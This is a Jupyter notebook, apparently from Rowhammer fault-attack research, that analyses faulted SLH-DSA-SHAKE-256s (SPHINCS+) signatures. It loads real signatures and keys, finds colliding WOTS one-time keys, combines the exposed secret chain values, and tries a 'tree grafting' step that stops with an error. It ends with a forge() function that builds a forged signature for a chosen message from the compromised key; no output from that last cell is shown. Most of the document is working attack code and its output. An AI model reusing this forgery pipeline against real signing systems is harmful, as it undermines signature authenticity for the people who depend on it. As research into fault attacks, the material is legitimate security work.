# Config

In [1]:
base = "../"
#base = "../victims/sphincsplus/ref/"
keys_file = base + "keys.txt"
sigs_file = base + "sigs.txt"
sigs_simulated_file = base + "sigs_simulated.txt"

params = 'SLH-DSA-SHAKE-256s'

sanity_check = True
simulate_faults = False
filter_sigs  = True
use_pickle = True

# Setup

Install dependencies, define some helper functions

In [2]:
%pip install -r requirements.txt
!python --version


[1m[[0m[34;49mnotice[0m[1;39;49m][0m[39;49m A new release of pip is available: [0m[31;49m25.0.1[0m[39;49m -> [0m[32;49m25.1.1[0m
[1m[[0m[34;49mnotice[0m[1;39;49m][0m[39;49m To update, run: [0m[32;49mpip install --upgrade pip[0m
Note: you may need to restart the kernel to use updated packages.
Python 3.10.12


In [3]:
import fips205

In [4]:
slh = fips205.SLH_DSA(params)
a = slh.a
d = slh.d
hp = slh.hp
n = slh.n
k = slh.k

In [5]:
def print_adrs(adrs: fips205.ADRS, end='\n', verbose=False):
    hex = adrs.adrs().hex()
    if verbose:
        print('LAYER' + ' ' * 4 + 
              'TREE ADDR' + ' ' * 18 +
              'TYP' + ' ' * 6 +
              'KADR' + ' ' * 5 +
              'PADD = 0')
    print(' '.join([hex[i:i+8] for i in range(0, len(hex), 8)]), end=' ')
    print(end=end)

In [6]:
import os

def pickle_load(filename: str, or_else):
    if use_pickle:
        import pickle
        if os.path.exists(filename):
            print(f"Loading pickle from {filename}.")
            with open(filename, 'rb') as f:
                return pickle.load(f)
        else:
            print(f"File {filename} not found, creating new one.")
            return pickle_store(filename, or_else)
    else:
        print(f"Pickle loading is disabled, using fallback.")
        return or_else()
    
def pickle_store(filename: str, fn):
    if use_pickle:
        import pickle
        value = fn()
        with open(filename, 'wb') as f:
            pickle.dump(value, f)
        return value
    else:
        print(f"Pickle storing is disabled, not saving {filename}.")
        value = fn()
        return value

In [7]:
from os import cpu_count


def extract_wots_keys(pk: bytes, sigs: list[bytes]) -> dict[fips205.ADRS, set[fips205.WOTSKeyData]]:
    import multiprocessing
    from cryptanalysis_lib import process_sig
    wots_bytes = slh.len * n
    xmss_bytes = hp * n
    fors_bytes = k * (n + a * n)
    sig_len = n + fors_bytes + d * (wots_bytes + xmss_bytes)

    with multiprocessing.Pool(processes=cpu_count()-1) as pool:
        args = [(params, pk, sig_idx, sig, sig_len) for sig_idx, sig in enumerate(sigs)]
        results = pool.map(process_sig, args)
    
    # Merge results
    merged = {}
    for item in results:
        merged = merge_groups(merged, item)
    return merged

def merge_groups(left: dict[fips205.ADRS, set], right: dict[fips205.ADRS, set]) -> dict[fips205.ADRS, set]:
    for key, items in right.items():
        if key not in left:
            left[key] = set()
        left[key] = left[key] | items
    return left


In [8]:
from typing import Generator


def shared_intermediates(v1: fips205.WOTSKeyData, valid: fips205.WOTSKeyData) -> Generator[tuple[int, int], None, bool]:
    if not v1.intermediates or not valid.intermediates:
        return False
    if v1 == valid:
        return False
    retval = False
    for chain_idx, chain in enumerate(v1.intermediates):
        if not chain:
            continue
        for hash_iter, step in enumerate(chain[1:], start=1):
            if step == valid.sig[chain_idx*n:(chain_idx+1)*n]:
                retval = True
                yield (chain_idx, hash_iter)
    return retval
    

def find_collisions(wots_sigs: dict[fips205.ADRS, set[fips205.WOTSKeyData]]) -> dict[fips205.ADRS, set[fips205.WOTSKeyData]]:
    return {adrs: keys for adrs, keys in wots_sigs.items() if any(v.valid for v in keys) and not all(v.valid for v in keys)}

def print_arr_w(arr: list[int], width=int):
    print('[ ', end='')
    for x in arr:
        print(f"{x:0{width}d}", end=' ')
    print(']')
    
def valid_sigs_d(groups):
    return {adrs: key for adrs, keys in groups.items() for key in keys if key.valid}

def hex(s: bytes | None) -> str:
    return s.hex() if s else "None"

def print_key_data(v: fips205.WOTSKeyData, adrs: fips205.ADRS, pk_seed: bytes, valid_key: fips205.WOTSKeyData = None, indent=''):
    print(indent + ("Valid" if v.valid else "Invalid" if v.valid == False else "--"), end='\t')
    print(indent + v.sig.hex()[:128] + '...')
    print(indent + '\tPK (from tree)\t' + hex(v.pk))
    pk = v.calculate_pk(params, adrs, pk_seed)
    print(indent + '\tPK (calculated)\t' + hex(pk))
    print(indent + f"\tWOTS key is part of signature {v.sig_idx}")
    print(indent + '\t\t\t', end='')
    print_arr_w([i for i in range(len(v.chains))], 2)
    print(indent + '\t' + "chains\t\t", end='')
    print_arr_w(v.chains, 2)
    print(indent + '\t' + "chains (calc)\t", end = '')
    print_arr_w(v.chains_calculated, 2)
    if valid_key and not v.valid:
        for chain_idx, exposed in shared_intermediates(v, valid_key):
            print(indent + f"\t\tExposed {exposed} secret values at chain_idx {chain_idx}")
    

def print_groups(pk_seed: bytes, groups: dict[fips205.ADRS, list[fips205.WOTSKeyData]], skip_no_exposed=True):
    #collisions: list[tuple[fips205.ADRS, set[fips205.WOTSKeyData]]] = [(adrs, value) for adrs, value in collisions if any(v.valid for v in value) and not all(v.valid for v in value)]
    #print(f"Found {len(collisions)} groups with at least one valid and one invalid key")
    # collisions where PK match. This is not necessary. Better: find exposed keys by running WOTS chain
    """collisions = [
        (adrs, value)
        for adrs, value in collisions
        if any(v1.msg != v2.msg and v1.pk == v2.pk for v1 in value for v2 in value if v1.valid and not v2.valid)
    ]"""
    
    valid_sigs = valid_sigs_d(groups)

    # sort by layer address
    groups = sorted(groups.items(), key=lambda item: item[0].get_layer_address())
    
    for adrs, value in groups:
        valid_sig = valid_sigs[adrs] if adrs in valid_sigs else None
        invalid_sigs = [v for v in value if not v.valid]
        print_adrs(adrs, end='', verbose=True)
        print(len(value))
        
        for v in [valid_sig] + invalid_sigs:
            if not v:
                continue
            if skip_no_exposed and not v.valid and not shared_intermediates(v, valid_sig):
                continue
            print_key_data(v, adrs, pk_seed, valid_sig, indent='\t')

# Clean Start

Run this cell (and below) for a clean analysis

In [9]:
groups: dict[fips205.ADRS, set[fips205.WOTSKeyData]] = {}

In [10]:
# Load keys
with open(keys_file, "r") as f:
    lines = [s.split(': ') for s in f.readlines()]
    keys = {s[0]: bytes.fromhex(s[1].strip()) for s in lines}
sk = keys['sk']
pk = keys['pk']
pk_seed = pk[:n]
pk.hex()

'0bc005bdb4dfb431bb250e109ca4430d42f4fd7e9270f515640701df308413952d854a500f3e893a8804ad88a600ee6812c3317e422848c5854c2b18588c1b9a'

# Update Experiment
Run this cell (and below) to process new signatures

# Load real signatures

This loads the real signatures from `sigs_file` (see config)

In [11]:
def load_groups():
    with open(sigs_file, "r") as f:
        sigs = [bytes.fromhex(s.strip()) for s in f.readlines()]
        # sigs = sigs[:1000]
    print(f"Processing {len(sigs)} signatures...", end=' ')
    groups = extract_wots_keys(pk, sigs)
    return sigs, groups

sigs, groups = pickle_load("sigs_groups.pkl", load_groups)
print(f"Loaded {len(sigs)} signatures in {len(groups)} groups")
total_sigs = sum(len(v) for v in groups.values())
print(f"Total signatures in groups: {total_sigs}")

Loading pickle from sigs_groups.pkl.
Loaded 29065 signatures in 198057 groups
Total signatures in groups: 200596


# Load simulated faulty signatures
This section loads simulated faults from `sigs_simulated_file`

In [12]:
import os
if simulate_faults:
    with open(sigs_simulated_file, "r") as f:
        faulty_sigs = [bytes.fromhex(s.strip()) for s in f.readlines()]
    print(f"Loaded {len(faulty_sigs)} faulty (simulated) signatures")
    simulated_groups = extract_wots_keys(pk, faulty_sigs)
    for adrs, keys in simulated_groups.items():
        for key in keys:
            key.simulated = True
    #print_groups(pk_seed, simulated_groups)
    groups = merge_groups(groups, simulated_groups)
else:
    print("Fault simulation disabled or no simulated faulty signatures found")

Fault simulation disabled or no simulated faulty signatures found


# Tooling sanity check

This section tries to generate a signature using the same key and randomization values as the first signature in `sigs_file`.
We expect them to match. This assumes that the first signature in `sigs_file` is a valid signature.

In [13]:
if sanity_check:
    wots_len = slh.len
    wots_bytes = wots_len * n
    xmss_bytes = hp * n
    fors_bytes = k*(n + a * n)
    sig_len = n + fors_bytes + d * (wots_bytes + xmss_bytes)

    sig = sigs[0]

    m = sig[sig_len:]
    r = sig[:n]
    pysig = slh.slh_sign_internal(m, sk, None, r=r, stop_at=None)
    pysig += m

    if pysig != sig:
        print("Signature mismatch")
        print(pysig.hex())
        print(sig.hex())
    print("Passed sanity check")
else:
    print("Skipping sanity check")

LAYER    TREE ADDR                  TYP      KADR     PADD = 0
00000000 00000000 002ba2a1 6debacce 00000002 00000000 00000000 000000b3 
00000001 00000000 00002ba2 a16debac 00000002 00000000 00000000 000000ce 
00000002 00000000 0000002b a2a16deb 00000002 00000000 00000000 000000ac 
00000003 00000000 00000000 2ba2a16d 00000002 00000000 00000000 000000eb 
00000004 00000000 00000000 002ba2a1 00000002 00000000 00000000 0000006d 
00000005 00000000 00000000 00002ba2 00000002 00000000 00000000 000000a1 
00000006 00000000 00000000 0000002b 00000002 00000000 00000000 000000a2 
Passed sanity check


# Extract WOTS keys

Extract all WOTS keys in all signatures

In [14]:
if False:
    # get distribution of steps in (valid) signatures
    distr = [[0 for _ in range(16)] for _ in range(67)]
    for adrs, keys in groups.items():
        for key in keys:
            if key.valid:
                for chain_idx, chain in enumerate(key.chains):
                        distr[chain_idx][chain] += 1           
    distr

    %pip install matplotlib
    import matplotlib.pyplot as plt

    # distr is your 67×16 list of counts
    # e.g. distr = [[…], …, […]]

    plt.figure(figsize=(8, 10))
    plt.imshow(distr, aspect='auto')        # default colormap
    plt.colorbar(label='Count')              # show scale
    plt.xlabel('Step value (0–15)')
    plt.ylabel('Chain index (0–66)')
    plt.title('Distribution of steps in valid signatures')
    plt.tight_layout()
    plt.show()

# Group Collisions

...appear here!

In [15]:
# sanity check for multiple valid keys
for adrs, keys in groups.items():
    if len([v for v in keys if v.valid]) > 1:
        print("ERROR: found multiple valid keys for the same address", adrs, keys)
        raise ValueError("Multiple valid keys for the same address")

In [16]:
# maintain a dictionary of valid signatures per adrs
valid_sigs = valid_sigs_d(groups)

In [17]:
# only keep keys at target layer
target_layer = 7
groups = {adrs: sigs for adrs, sigs in groups.items() if adrs.get_layer_address() == target_layer}
groups = {adrs: sigs for adrs, sigs in groups.items() if len(sigs) > 0}
print(f"Found {len(groups)} groups at layer {target_layer}")

# only keep collisions
groups = find_collisions(groups)
print(f"Found {len(groups)} groups with collisions")

Found 256 groups at layer 7
Found 217 groups with collisions


In [18]:
# post-process collided WOTS keys
def calc_intermediates():
    for adrs, keys in groups.items():
        if adrs not in valid_sigs:
            continue
        valid_sig = valid_sigs[adrs]
        for key in keys:
            key.calculate_intermediates(params, adrs, pk_seed, valid_sig)
    return groups
        
groups = pickle_load("groups_intermediates.pkl", calc_intermediates)
print(f"Calculated intermediates for {len(groups)} groups")

Loading pickle from groups_intermediates.pkl.
Calculated intermediates for 217 groups


In [19]:
# filter out all-7 sigs
all_7_indices = set()
with open("sigs_wots7.txt", "w") as f, open("sigs_not_wots7.txt", "w") as f_not:
    for adrs, keys in groups.items():
        break
        for i, key in enumerate(keys.copy()):
            if all(c == 7 for c in key.chains_calculated):
                f.write(f"{sigs[key.sig_idx].hex()}\n")
                #keys.remove(key)
            else:
                f_not.write(f"{sigs[key.sig_idx].hex()}\n")

# filter out signatures containing no WOTS secrets
groups = {adrs: [sig for sig in sigs if any(i < 17 for i in sig.chains_calculated)] for adrs, sigs in groups.items()}
groups = find_collisions(groups)
print(f"Found {len(groups)} groups with at least one WOTS secret")

Found 217 groups with at least one WOTS secret


In [20]:
#print_groups(pk_seed, groups)

In [21]:
def filter_signatures(sigs: list[bytes], wots_keys: dict[fips205.ADRS, set[fips205.WOTSKeyData]]) -> set[bytes]:
    filtered_sigs = set()
    collisions = find_collisions(wots_keys)
    collisions = {adrs: sigs for adrs, sigs in collisions.items() if any(sig.valid for sig in sigs) and not all(sig.valid for sig in sigs)}
    valid_sigs = valid_sigs_d(wots_keys)
    for adrs, keys in collisions.items():
        for key in keys:
            if key.valid:
                # keep valid keys
                filtered_sigs.add(sigs[key.sig_idx])
            if adrs in valid_sigs and shared_intermediates(key, valid_sigs[adrs]):
                filtered_sigs.add(sigs[key.sig_idx])
    return filtered_sigs

if filter_sigs:
    # only keep signatures that are valid or have exposed WOTS keys
    filtered_sigs = filter_signatures(sigs, groups)
    print(f"Kept {len(filtered_sigs)} of {len(sigs)} signatures")
    with open("../sigs_filtered.txt", "w") as f:
        for sig in filtered_sigs:
            f.write(sig.hex() + "\n")

Kept 446 of 29065 signatures


# Combine WOTS Keys
This section combines the collided keys

In [22]:
# filter groups with exposed WOTS secrets
groups = {adrs: sigs 
    for adrs, sigs in groups.items()
    if any(not sig.valid and shared_intermediates(sig, valid_sigs[adrs]) for sig in sigs)
}
print(f"Found {len(groups)} groups with exposed WOTS secrets")
#print_groups(pk_seed, groups)

Found 217 groups with exposed WOTS secrets


In [23]:
# Join WOTS keys to get a WOTS key usable for signing as many messages as possible
from copy import deepcopy

def join_sigs(wots_keys: dict[fips205.ADRS, set[fips205.WOTSKeyData]], params, pk_seed) -> dict[fips205.ADRS, fips205.WOTSKeyData]:
    joined_sigs = {}
    valid_sigs = valid_sigs_d(wots_keys)
    for adrs, keys in wots_keys.items():
        if len(keys) < 2:
            continue
        retval = deepcopy(valid_sigs[adrs])
        if not retval.chains_calculated:
            print_adrs(adrs)
            retval.calculate_intermediates(params, adrs, pk_seed, valid_sigs[adrs])
        for key in keys:
            retval = retval.join(key, params)
        joined_sigs[adrs] = retval
    return joined_sigs

joined_sigs = join_sigs(groups, params, pk_seed)
print(f"Joined {len(joined_sigs)} signatures")

#for adrs, key in joined_sigs.items():
#    print_adrs(adrs, verbose=True)
#    print_key_data(key, adrs, pk_seed, None)

# Filter out signatures with all chains set to 0
#joined_sigs = {adrs: key for adrs, key in joined_sigs.items() if any(c > 0 for c in key.chains_calculated)}
#print(f"Filtered {len(joined_sigs)} (wildcard chains)")

Joined 217 signatures


In [24]:
# Find the key where the maximum number of chains are exposed (i.e., valid_sig.chain[i] - c is maximized for all chains 0 <= i < len)
def score(key: fips205.WOTSKeyData) -> int:
    return sum(slh.w - c for c in key.chains_calculated)
most_exposed_adrs, most_exposed_key = max(
    joined_sigs.items(),
    key=lambda item: score(item[1]))
print("Key with most exposed chains (score: {}):".format(
    score(most_exposed_key)
))
print_adrs(most_exposed_adrs, verbose=True)
print_key_data(most_exposed_key, most_exposed_adrs, pk_seed, None)

print("="*64)
print("All keys for exposed address:")
print_adrs(most_exposed_adrs, verbose=True)
for key in groups[most_exposed_adrs]:
    print_key_data(key, most_exposed_adrs, pk_seed, valid_sigs[most_exposed_adrs])

Key with most exposed chains (score: 1072):
LAYER    TREE ADDR                  TYP      KADR     PADD = 0
00000007 00000000 00000000 00000000 00000001 000000ff 00000000 00000000 
--	0e20b354f20e056c26cf6ecdc070a059dc72c69e5be2a3a7e6b9c0097052013fb150c1b77c8d921b44c438b963b9c5e0dcb1d92ea08c845c23f3139e6b39ccbc...
	PK (from tree)	None
	PK (calculated)	520887e8e95bbaa97f7f4a372f0c3e37bcd045efbe1239e7518cb43a746ef335
	WOTS key is part of signature None
			[ 00 01 02 03 04 05 06 07 08 09 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 ]
	chains		[ 09 07 11 14 10 05 09 03 03 05 15 08 13 01 03 09 04 06 00 04 12 01 00 01 10 08 14 02 04 10 10 04 05 06 01 02 04 11 10 03 11 14 15 03 04 02 01 08 04 10 15 09 00 09 14 05 00 07 10 13 00 01 02 15 02 01 03 ]
	chains (calc)	[ 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

In [25]:
# calculate number of signinable messages (without checksum)
import math


def num_signable_messages(key: fips205.WOTSKeyData) -> int:
    num_sign = 1
    for i in range(slh.len1):
        if key.chains_calculated[i] < slh.w - 1:
            num_sign *= (slh.w - 1 - key.chains_calculated[i])
    return num_sign/((slh.w-1)**slh.len1)
num_signable = num_signable_messages(most_exposed_key)
expected_reps = 1/num_signable
print(f"Fraction of signable messages: {num_signable}")
print(f"Expected number of repetitions until a valid signature is found: 2**{math.log2(expected_reps)}")

Fraction of signable messages: 1.0
Expected number of repetitions until a valid signature is found: 2**0.0


In [26]:
# sign a random message with the exposed key
#msg = bytes.fromhex('bc9c6c7892ac9aa558a7ee5ef40a50bed3796a3cc657e88c6cedec7ddffbdad2')
#assert most_exposed_key.try_sign(msg, most_exposed_adrs, pk_seed, params)

# Tree Grafting

In [27]:
import cryptanalysis_lib as clib
import importlib
importlib.reload(clib)

<module 'cryptanalysis_lib' from '/home/jb/rowhammer-jb/bs-poc/tools/cryptanalysis_lib.py'>

In [28]:
#%timeit clib.sign_worker((1, most_exposed_adrs, most_exposed_key, pk_seed, params))

In [29]:
#%timeit clib.sign_worker_xmss((1, most_exposed_adrs, most_exposed_key, pk_seed, params))

In [30]:
#%timeit clib.sign_worker_xmss_c((1, most_exposed_adrs, most_exposed_key, pk_seed, params))

In [31]:
import math
from multiprocessing import Pool
from os import cpu_count

import concurrent

def sign_message_batch_mp(total_msgs, adrs, key, pk_seed, params, num_procs=None):
    """
    Use a process pool to sign `total_msgs` messages *per* (adrs,key).
    Returns the first successful message signed by any process.
    """
    if num_procs is None:
        num_procs = cpu_count()

    # Split total_msgs into roughly equal chunks per process
    per_proc = math.ceil(total_msgs / num_procs)
    print("Total messages per process:", per_proc)

    # Build one work item per (process x key)
    work = [(per_proc, adrs.copy(), key, pk_seed, params) for _ in range(num_procs)]
    
    with concurrent.futures.ProcessPoolExecutor() as executor:
        futures = {executor.submit(clib.sign_worker_xmss_c, work): work for work in work}
        
        for future in concurrent.futures.as_completed(futures):
            try:
                result = future.result()
                if result:
                    # Cancel all other futures
                    for f in futures:
                        f.cancel()
                    return result
            except Exception as e:
                print("Error:", e)
    return None

if expected_reps > 2**29:
    raise ValueError("Expected repetitions are too high, aborting")
num_sigs = 10

print(f"Signing {num_sigs} messages")
xmss_pk, adrs, sk_seed, key  = sign_message_batch_mp(num_sigs, most_exposed_adrs, most_exposed_key, pk_seed, params, num_procs=cpu_count()-1)
print("Successfully grafted tree for XMSS PK " + xmss_pk.hex())
print("Address")
print_adrs(adrs, verbose=True)
print("SK seed:", sk_seed.hex())
print("PK seed:", pk_seed.hex())
print("Key:", key)

Signing 10 messages
Total messages per process: 4


ValueError: not enough values to unpack (expected 4, got 3)

In [None]:
import importlib
importlib.reload(fips205)

def forge(valid_sig: bytes, sk: bytes, pk: bytes, adrs: fips205.ADRS, key: fips205.WOTSKeyData, m: bytes, params: str):
    slh = fips205.SLH_DSA(params)
    pk_seed = pk[:slh.n]
    pk_root = pk[slh.n:]
    top_part = valid_sig[n + fors_bytes + (d-1) * (wots_bytes + xmss_bytes) + wots_bytes:n + fors_bytes + d * (wots_bytes + xmss_bytes)]
    forged_sig = None
    # find a randomization value R that matches the adrs of the exposed key
    addrnd = None
    while not addrnd:
        addrnd = os.urandom(32)
        digest  = slh.h_msg(addrnd, pk_seed, pk_root, m)
        (_, i_tree, i_leaf) = slh.split_digest(digest)
        hp_m    = ((1 << slh.hp) - 1)
        for i in range(1, target_layer-1):
            i_leaf = i_tree & hp_m  # i_leaf = i_tree mod 2^h'
            i_tree  =   i_tree >> slh.hp  # i_tree >> h'
        if i_leaf != adrs.get_layer_address():
            #print(f"Leaf index {i_leaf} in layer {target_layer} does not match target index {adrs.get_key_pair_address()}, retrying...")
            addrnd = None
            continue
    while not forged_sig:
        bottom_part, root = slh.slh_sign_internal(m, sk, addrnd, stop_at=target_layer-1)
        pk_seed = pk[:slh.n]
        forged_sig = key.try_sign(root, adrs, pk_seed, params)
    print(len(bottom_part))
    print(len(forged_sig))
    print(len(top_part))
    return bottom_part + forged_sig + top_part

sk_prf = os.urandom(32)
_, sk = slh.slh_keygen_internal(sk_seed, sk_prf, pk_seed, params)
valid_sig = next(key for key in groups[most_exposed_adrs] if key.valid)

wots_bytes = slh.len * n
xmss_bytes = hp * n
fors_bytes = k * (n + a * n)
sig_len = n + fors_bytes + d * (wots_bytes + xmss_bytes)
valid_sig = sigs[valid_sig.sig_idx]
m = valid_sig[sig_len:]
valid_sig = valid_sig[:sig_len]

print(f'verifying message "{m.decode()}" with valid signature')
suc = slh.slh_verify_internal(m, valid_sig, pk, params)
print("Signature verification result:", suc)

print(f'Signining message "{m.decode()}" with compromised key')
sig = forge(valid_sig, sk, pk, most_exposed_adrs, most_exposed_key, m, params)
print(f'verifying message "{m.decode()}" with forged signature')
suc = slh.slh_verify_internal(m, sig, pk, params)
print("Signature verification result:", suc)